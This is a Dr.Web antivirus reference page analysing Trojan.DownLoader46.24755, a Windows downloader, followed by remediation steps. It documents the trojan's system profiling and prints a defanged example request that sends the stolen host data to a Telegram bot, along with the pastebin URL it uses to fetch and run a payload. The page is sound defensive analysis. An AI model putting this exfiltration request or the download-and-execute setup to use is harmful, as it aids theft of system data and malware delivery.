Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.DownLoader46.24755

Добавлен в вирусную базу Dr.Web: 2023-10-18

Описание добавлено:

Packer: Themida

Compilation date: 21.09.2023 12:32:30

SHA1 hash:

  • 3f34031b923dc68667859162260b22830cbce521 (Проводник.exe)

Description

A trojan application written in C++ and designed to run on computers with Microsoft Windows operating systems. Its main purpose is to download and launch a malicious payload within an infected system.

Operating routine

Upon launch, the trojan collects the following information about the infected system:

Parameter name (key) The contents (value) Data-collection method
Computer Name The infected computer’s name
Windows Version Windows version
Total RAM RAM capacity \root\CIMV2Win32_ComputerSystem entity ― TotalPhysicalMemory field
Processor The CPU name \root\CIMV2Win32_Processor entity ― Name field
External IP User IP address From the response when contacting hxxp[:]//api.ipify[.]org
Manufacturer The name of the computer manufacturer \root\CIMV2Win32_ComputerSystem entity ― Manufacturer field
Model The name assigned to the computer by its manufacturer (PC model name) \root\CIMV2Win32_ComputerSystem entity ― Model field
BIOS Contains information about BIOS

Information is also gathered about BIOS:

Parameter Name (key) The contents (value) Data-collection method
Version BIOS version \root\CIMV2Win32_BIOS entity ― Version field
Release Date BIOS release date \root\CIMV2Win32_BIOS entity ― ReleaseDate field
Caption The description from the manufacturer \root\CIMV2Win32_BIOS entity ― Caption field
SMBIOS SMBIOS version \root\CIMV2Win32_BIOS entity ― SMBIOSBIOSVersion field

Next, the technical information collected from the system is sent to a Telegram bot as a string in the following format: <key>:<value>\n.... And for that, the following parameters are used:

  • 6393******:**********FKPI8su1qdfenHz********** is a bot token;
  • 6346****** is a chat identifier (chat_id).

Below is an example of the resulting request:


hxxps[:]//api[.]telegram[.]org/bot6393******:**********FKPI8su1qdfenHz**********/sendMessage?chat_id=6346******&text=<system information>

After this message containing the system information is sent, the trojan obtains an encrypted target URL from the hxxps[:]//pastebin[.]com/y5NUQPwY webpage. Once this URL is decrypted, the trojan downloads the payload, saves it to %LOCALAPPDATA%\Default\Windows\data\ldled and executes it.

Artifacts

The trojan’s code includes information containing debug symbols: C:\Users\Snusoed\source\repos\Scaner_load\Release\Scaner_load.pdb.

Indicators of compromise

News about the trojan

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке